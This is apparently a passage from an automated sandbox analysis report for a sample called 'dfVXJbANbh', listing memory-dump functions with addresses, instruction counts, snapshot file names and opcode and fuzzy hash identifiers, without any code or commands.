                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 354e7ea893cc6caa50d1e6e62a53baf757626885c4f4823b37cdd17a22d13d97
                      • Instruction ID: 7018d1617d4aef8c2241c5c45cdbfa45d7d77d65b0b613dffb884a8701109a75
                      • Opcode Fuzzy Hash: 354e7ea893cc6caa50d1e6e62a53baf757626885c4f4823b37cdd17a22d13d97
                      • Instruction Fuzzy Hash: 9B81A03095E6CA8FE7929B6488A82FA7FF0FF07310F0505BAD644C70A2DA7C5549D742
                      Function 00007FFD344B0066 Relevance: .2, Instructions: 248COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9b3fd316ff3639d9b8a70677ea67bcf2548310d15f86b6b4a70f9c89c7b122e
                      • Instruction ID: f606fe0c09c978600653ec6bb3b6b8412ed1ae1b3d383c0fc098c0ac056ffb5b
                      • Opcode Fuzzy Hash: c9b3fd316ff3639d9b8a70677ea67bcf2548310d15f86b6b4a70f9c89c7b122e
                      • Instruction Fuzzy Hash: 5381BE30E0D60A8FEB51EB64C8A86EE7BF0FF0A311F0145BAD548D7196DEB8A5459B40
                      Function 00007FFD34494F18 Relevance: .2, Instructions: 242COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 31389b52dbe58f9ae1e5a574c8e18f1ca7aa5e68ac8554566a1da1b445a6b2ad
                      • Instruction ID: 0f155ce62e7714da3bd8e0204ad9ed8ad41cf2f4bf9bf8128163f883e3209ff9
                      • Opcode Fuzzy Hash: 31389b52dbe58f9ae1e5a574c8e18f1ca7aa5e68ac8554566a1da1b445a6b2ad
                      • Instruction Fuzzy Hash: 5981E432E0E68A4FE7A59F3488692F97FE0FF07304F0505BAD948C6096DA7CA554A742
                      Function 00007FFD344A2868 Relevance: .2, Instructions: 235COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0797e5504f11b3ca51e64602404ae71ff7739fdf59d270780ee883c8e9106c07
                      • Instruction ID: 309e1bc4794d924b16374149e308adf0d5170c22f0c8fdd4d5598a0256b64d95
                      • Opcode Fuzzy Hash: 0797e5504f11b3ca51e64602404ae71ff7739fdf59d270780ee883c8e9106c07
                      • Instruction Fuzzy Hash: 68917A30E0A2598EEBA4DF64C4A47EDB7F1EF56300F11457AD10DE7289DA78A988DF40
                      Function 00007FFD344A1E38 Relevance: .2, Instructions: 229COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bcca83679ce78c9100d5bb061e8fe45ed6c2621a1c16f5c28f1620466e2a6a78
                      • Instruction ID: c492df15c8b9ddceca4dddbd112c572562e9e118de55b03d7c4ade7193712cc0
                      • Opcode Fuzzy Hash: bcca83679ce78c9100d5bb061e8fe45ed6c2621a1c16f5c28f1620466e2a6a78
                      • Instruction Fuzzy Hash: 4A616935A0E6CE4FE7A19A2498611FABBF4FF47310F0601B7D518C7182DBAD99159381
                      Function 00007FFD3449C140 Relevance: .2, Instructions: 228COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7465b36d6a9ce7c6a0216ad596848e521af01fbb1fb71a1d8c0f2ca1cfe371c7
                      • Instruction ID: b5805a1f35e9fe236290eadfcf027ec82672f8d7ef358ff265ba363a142c8388
                      • Opcode Fuzzy Hash: 7465b36d6a9ce7c6a0216ad596848e521af01fbb1fb71a1d8c0f2ca1cfe371c7
                      • Instruction Fuzzy Hash: EE813831A0C78A9FE3169F6894A31E97FB0FF07300F4145B6C109E60BADB39A659D741
                      Function 00007FFD34493C70 Relevance: .2, Instructions: 224COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: df4697b3f26d6b9d7a95dd1c43c40261e3ff74b01c891ed9794fd92fb34d7662
                      • Instruction ID: 859dbf1fbe834e8f2a35b4491ae2cd09e0e5118aa3a43b32dc98077f6aed58de
                      • Opcode Fuzzy Hash: df4697b3f26d6b9d7a95dd1c43c40261e3ff74b01c891ed9794fd92fb34d7662
                      • Instruction Fuzzy Hash: DE711332E0E68A4FE7A59F7488692F97BE0EF07314F0505BBD548C6093DA7CA454E742
                      Function 00007FFD34499CC0 Relevance: .2, Instructions: 222COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d78b8bf04c0bdbf5d602543531e7bff3649903b9d8cb09f9df7fcbe0f6efed2f
                      • Instruction ID: 1f03c7da2da72f7470a3fa152adb2eee88c371b75b1459aac5ea69e0c863b2b6
                      • Opcode Fuzzy Hash: d78b8bf04c0bdbf5d602543531e7bff3649903b9d8cb09f9df7fcbe0f6efed2f
                      • Instruction Fuzzy Hash: 4F710430E0D64E8FEB95EF6488A92F97BE0FF1A300F0505BAD50DD3292DA79A440DB41
                      Function 00007FFD344B0866 Relevance: .2, Instructions: 221COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 224c2c708bdd2121f6b725c7a7e2bea7ca17578524fc27c43eb667599fc453f3
                      • Instruction ID: fc452f67001b819a05b911a007e95849f972c48993f2437e48285c96bb736917
                      • Opcode Fuzzy Hash: 224c2c708bdd2121f6b725c7a7e2bea7ca17578524fc27c43eb667599fc453f3
                      • Instruction Fuzzy Hash: 03815C30E096498FEB50EBA4C8A46ED7BF0FF1A301F0105BAD149E7196DEB8A944DB51
                      Function 00007FFD344A37BE Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 670658a4e31919ec3737f826882535643c8edd845a1335a27ef3d58f394355b1
                      • Instruction ID: 569a4312a9301e90b64696b812651ddc21effb374d95e23f83b94ede05a3f0ba
                      • Opcode Fuzzy Hash: 670658a4e31919ec3737f826882535643c8edd845a1335a27ef3d58f394355b1
                      • Instruction Fuzzy Hash: 12810C30E55A1D8FDB94EBA8C495BACB7B1FF59700F5001B9D00CE7286DE39A880DB51
                      Function 00007FFD344A9810 Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1fecf16c2b7cb13b10b5f33f89bf3472fea115f7b1b6e7b870462c8127c9c67
                      • Instruction ID: 9d42f50bb4e25388dc125ee684fb81d83b08eeb6c5f0eda49d9d161353c9ef47
                      • Opcode Fuzzy Hash: e1fecf16c2b7cb13b10b5f33f89bf3472fea115f7b1b6e7b870462c8127c9c67
                      • Instruction Fuzzy Hash: 9581CF30A0E7CA8FEB969B2488651A93FB0BF07310F0605FBD958C6192DB79D508DB42
                      Function 00007FFD344A01A0 Relevance: .2, Instructions: 218COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: efabcf49a6e52f449f4647e1a60283a4a9a5bd1fff79c7c505a235535b6bbd5b
                      • Instruction ID: d36d54a2167a2129698438fe563d8f0515f1b76eff1b2180c95490a7faafe82b
                      • Opcode Fuzzy Hash: efabcf49a6e52f449f4647e1a60283a4a9a5bd1fff79c7c505a235535b6bbd5b
                      • Instruction Fuzzy Hash: 0671E570E0951D8FEB94EF98D4A56EDB7B1FF5A300F51017AD10DE3286CE786981AB40
                      Function 00007FFD3449746D Relevance: .2, Instructions: 215COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd5c9c20a9e8c05f534f1ae34a4e145967284923ba56eb2bdc2971f49734a3ea
                      • Instruction ID: 7c45ac845ee550b0806496db53bb3cf1302c8e3c341f80c54b05f0c6dbdfee1d
                      • Opcode Fuzzy Hash: dd5c9c20a9e8c05f534f1ae34a4e145967284923ba56eb2bdc2971f49734a3ea
                      • Instruction Fuzzy Hash: 4581AC70E08609CFEB94EF64C4A52FDBBB1EF5A310F11417AD109D7286DABC6844EB40
                      Function 00007FFD344ADDC0 Relevance: .2, Instructions: 215COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64af3e1e0e980b685aa3685ce2ebe33bba3baf3a803ba30e84d4a4ac0bd157ed
                      • Instruction ID: 94352067cf1a7e73283943c7f8a6b2e3ac12225e8605b4dbc63f7532ede0760d
                      • Opcode Fuzzy Hash: 64af3e1e0e980b685aa3685ce2ebe33bba3baf3a803ba30e84d4a4ac0bd157ed
                      • Instruction Fuzzy Hash: EB61DF70E0EA4E8BEBA4AE6488642FA7BA1FF16310F01017AE51DC3185DBBDA5149741
                      Function 00007FFD3449F5A1 Relevance: .2, Instructions: 210COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4809f5ebffe1f5a1d9c6c4b2c5f889a5f8dc44471efda1b22d0e8ae6e55df4d6
                      • Instruction ID: c1e573d3bdf9d9a287bc9bdbc1b14cafbd9910a72b7ee8f91cbfa995ae73661c
                      • Opcode Fuzzy Hash: 4809f5ebffe1f5a1d9c6c4b2c5f889a5f8dc44471efda1b22d0e8ae6e55df4d6
                      • Instruction Fuzzy Hash: 05717F30A1D78E8FEB91DF2888A92FD7BF0FF16310F0105BAD508D6196DB7899459B41
                      Function 00007FFD344AD1F8 Relevance: .2, Instructions: 210COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1b6694f1c96db9c4538236c218060bdd6b6af99a8b3cd10fe173ffa9b043150a
                      • Instruction ID: 3157314aeaa16ff1c97aa30b26871152e6303c4fdf28bb3ddd47f4ab235061ea
                      • Opcode Fuzzy Hash: 1b6694f1c96db9c4538236c218060bdd6b6af99a8b3cd10fe173ffa9b043150a
                      • Instruction Fuzzy Hash: 0151E471B19E0A4FEBA8EB18D4A0575B3D2FF69314715027DD14EC368ADE68FC428780
                      Function 00007FFD3449AF40 Relevance: .2, Instructions: 209COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 09a1554928d7f3601dd28e18f38bf92bc5a12103d784988646f23b09d63dbfc6
                      • Instruction ID: 3833c5d1456ce20286c54a413d3a1a9467efadedeb400be57b300001be9eb1b9
                      • Opcode Fuzzy Hash: 09a1554928d7f3601dd28e18f38bf92bc5a12103d784988646f23b09d63dbfc6
                      • Instruction Fuzzy Hash: E2718130A1974E8FEB95DF2888A82FD7BF0FF1A300F0105BAD519D3196DB78A9459B41
                      Function 00007FFD344AB1A0 Relevance: .2, Instructions: 209COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 49373acd9ba19a037dc8ae4c4c90bc12a3c974bbefdc8bd46d5255b545f48113
                      • Instruction ID: 1a72c845da5f7ef7e039c9ab9aa147dc1f73f9402f99a92ad70e6bdc4b57093b
                      • Opcode Fuzzy Hash: 49373acd9ba19a037dc8ae4c4c90bc12a3c974bbefdc8bd46d5255b545f48113
                      • Instruction Fuzzy Hash: CF51C471B19E0A4FEBA8EA18D490575B3D2FFA9314715027DD14EC368ADE68FC428780
                      Function 00007FFD344A9DF3 Relevance: .2, Instructions: 208COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e2b31d8f15b34e945a0e56f057f69793dd010dd277f9bc140b53e8f2229535b1
                      • Instruction ID: cb1c4272657247febbd2457df42bb61095b6bd28fa6d32dd31e654148acc6b69
                      • Opcode Fuzzy Hash: e2b31d8f15b34e945a0e56f057f69793dd010dd277f9bc140b53e8f2229535b1
                      • Instruction Fuzzy Hash: 1F71F732E0E2854FEBA1DB6484A52EE7BF0EF03314F1546BAD148DB187DA78E845DB41
                      Function 00007FFD344A2910 Relevance: .2, Instructions: 208COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e9dc2be3d1ebce6fa0d1745dc9e67513e92b337a515dcac5035bfe851d6fb809
                      • Instruction ID: 2b9dcdb51a13674162bb66bac9c1efeb88feb6d2205f95981204aeff821ccf49
                      • Opcode Fuzzy Hash: e9dc2be3d1ebce6fa0d1745dc9e67513e92b337a515dcac5035bfe851d6fb809
                      • Instruction Fuzzy Hash: 7161B131A0995D8FDBA8EB18889A7F977F0EF59300F0101BED50DE7191DE796985CB80
                      Function 00007FFD34494F98 Relevance: .2, Instructions: 203COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2e1fa821f3baf03605ca7ef5a4aeb48ec109eae10f6eda0f2d8aff7bb1ac156a
                      • Instruction ID: 2d3dac2f5dac98a47938fc65ed26f1137283411f9d1fe16612f1fa545aefa4e1
                      • Opcode Fuzzy Hash: 2e1fa821f3baf03605ca7ef5a4aeb48ec109eae10f6eda0f2d8aff7bb1ac156a
                      • Instruction Fuzzy Hash: 0F71F332E0E68A4FE7A59F3488692F97FE0FF07304F1505BAD948C6092DA7CA554A742
                      Function 00007FFD344994B8 Relevance: .2, Instructions: 198COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 324db91cbf0df2770bde31b18235a99624757b83b9fa37628109d94edaf60bc4
                      • Instruction ID: 482d14011f278bde2eeb6edcc7c0ed55ded9f2db105f307ff253d6a936dbd9fc
                      • Opcode Fuzzy Hash: 324db91cbf0df2770bde31b18235a99624757b83b9fa37628109d94edaf60bc4
                      • Instruction Fuzzy Hash: BF617E30A0864E8FEB95EF68C8A86FD77F0FF1A300F1145BAD419D3195DB79A9449B40
                      Function 00007FFD34481C4D Relevance: .2, Instructions: 191COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34480000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d058ebddab5e6abedc38d02d79191df98a7757fc3357dbc5f4823be72d9f20cd
                      • Instruction ID: 49c2730be74881bcb801360ecf55d7ff218afe40bd36151d83a84e0bc6fa5947
                      • Opcode Fuzzy Hash: d058ebddab5e6abedc38d02d79191df98a7757fc3357dbc5f4823be72d9f20cd
                      • Instruction Fuzzy Hash: 4E51D131B1CB894FDB9CCE1888A45BA77E2FF99304B15017FD54AD3286CE79E8028781
                      Function 00007FFD344A009B Relevance: .2, Instructions: 191COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69400fa188202af516a279522f4a806b84c4afa2fa2ed90bb75a30c5db365611
                      • Instruction ID: ebd39a342f99b7012e11961396b480a27bbeaad78a7ca54bc6b7f5a00cb27c66
                      • Opcode Fuzzy Hash: 69400fa188202af516a279522f4a806b84c4afa2fa2ed90bb75a30c5db365611
                      • Instruction Fuzzy Hash: 40616930E0964E8FEB94EF68C8A92FE7BF0FF16300F0105BAD509D3196DA7969449B41
                      Function 00007FFD344A2920 Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2f357563f9cf7c382c4f339ceb181c88ba0e61c21bf9b2dbc2d340473dcc60cb
                      • Instruction ID: 0a023e293c7918f621c8d21176433cb4f5a75c0e9378b15e33acb47c0a393982
                      • Opcode Fuzzy Hash: 2f357563f9cf7c382c4f339ceb181c88ba0e61c21bf9b2dbc2d340473dcc60cb
                      • Instruction Fuzzy Hash: A6614A70E0A64E8FEB94DF68C4A52FD7BF0FF1A300F01417AD509E6296DA78A944DB41
                      Function 00007FFD3449CCA8 Relevance: .2, Instructions: 187COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cd32fa40afdc9f0276dbbb858ed91343a8ea9937438da3edf0fb703a2d1d9f23
                      • Instruction ID: e82ad00d726dcce7574a3f0c519da0c1c4782615c20c6fb807a8da987fc708d4
                      • Opcode Fuzzy Hash: cd32fa40afdc9f0276dbbb858ed91343a8ea9937438da3edf0fb703a2d1d9f23
                      • Instruction Fuzzy Hash: 4D614C70E1861D8FEB50EBA8C8A57EDBBF1FF5A300F11417AD509E7286CE7868419B41
                      Function 00007FFD344AB2D0 Relevance: .2, Instructions: 175COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 30db4145d579db1f16b5d079ea3cc7da31e8160d2e11e71d1a194f523d1a1fdb
                      • Instruction ID: f0601ce592ce7b3687ddf07915d13ae9802391dc9566d2b5c537155cca4141e6
                      • Opcode Fuzzy Hash: 30db4145d579db1f16b5d079ea3cc7da31e8160d2e11e71d1a194f523d1a1fdb
                      • Instruction Fuzzy Hash: 5F513A71B0E90A4FE798EB5C84D567637E6FF9A31471502B6D50DC715BCA28F802C780
                      Function 00007FFD34491210 Relevance: .2, Instructions: 172COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f28ec97f8ed2afa1f3ddcf9fafbde8e3149d2a0d6a8daa9b7f235a5d3563856a
                      • Instruction ID: c41b08474c80485b2d5446366404a0a607d41d40ef89012c4b7fdf7478fe2911
                      • Opcode Fuzzy Hash: f28ec97f8ed2afa1f3ddcf9fafbde8e3149d2a0d6a8daa9b7f235a5d3563856a
                      • Instruction Fuzzy Hash: DE519030A0978E8FEB95EF2488692FA7BF0FF16300F0105BAD919D7196DB78A5449781
                      Function 00007FFD34498D73 Relevance: .2, Instructions: 171COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 29f20d9f765c7466d095d2eaba4505f90f84d23ce735f97c62a6072150ab69ef
                      • Instruction ID: 76793a9849d8d0247bc7739d1815649b4ab740b733830afba77543e5ba57f7e6
                      • Opcode Fuzzy Hash: 29f20d9f765c7466d095d2eaba4505f90f84d23ce735f97c62a6072150ab69ef
                      • Instruction Fuzzy Hash: D1517B31E1860D8FEB54EFA8C4A56EDB7B1FF5A300F15013AD109E7285DBB9A841DB40
                      Function 00007FFD344AB830 Relevance: .2, Instructions: 171COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fb138f23e314a42987380e41854b00884d78e767edff3fbf7ccbfc51bb59749
                      • Instruction ID: 9d7bc3229c8976a998407d3e2c383eda14844342fdd4e8f0b4cb20ff4b86f005
                      • Opcode Fuzzy Hash: 5fb138f23e314a42987380e41854b00884d78e767edff3fbf7ccbfc51bb59749
                      • Instruction Fuzzy Hash: 6E516F30E1AA8E8FEB95EF6488692FA7BF0FF06300F0105BAD609D3196DB786544D741
                      Function 00007FFD34499108 Relevance: .2, Instructions: 171COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b2c712c4c5e1538946fe7292ef39f098ca23f0ddfbdfa171281b4a13fcb92de
                      • Instruction ID: f31df2e8126a560434b4d3c1cdc6b0bad0f6cd42c78e12506e968c25177e1c4c
                      • Opcode Fuzzy Hash: 5b2c712c4c5e1538946fe7292ef39f098ca23f0ddfbdfa171281b4a13fcb92de
                      • Instruction Fuzzy Hash: 5A514932A0D6494FEB15AFB8D8662EE7BF0EF03314F0401BBD548DB193DA286444DB91
                      Function 00007FFD344994C8 Relevance: .2, Instructions: 168COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c350aa31a5d454b55d1fbad46ad4c214908971ab96004f5480523ee03b425291
                      • Instruction ID: ac1c51f0ecb6690a7cb8f829c686bddf78748c4f4964ef30a22a15aa5070fabb
                      • Opcode Fuzzy Hash: c350aa31a5d454b55d1fbad46ad4c214908971ab96004f5480523ee03b425291
                      • Instruction Fuzzy Hash: B3617A30E0860D8FEB90EFA8C4A86ADB7F1FF09300F11017AD50AE3195DB786944EB41
                      Function 00007FFD34495018 Relevance: .2, Instructions: 168COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000014.00000002.3407703876.00007FFD34490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_7ffd34490000_dfVXJbANbh.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02be6d4e50f8b35aa0e9f1844dd4b38612a09754f46f669897e9448a38f1cd9f
                      • Instruction ID: f8079414a6b7c42751529306d44b06601fc35f98e183601601853f54a5a58959
                      • Opcode Fuzzy Hash: 02be6d4e50f8b35aa0e9f1844dd4b38612a09754f46f669897e9448a38f1cd9f
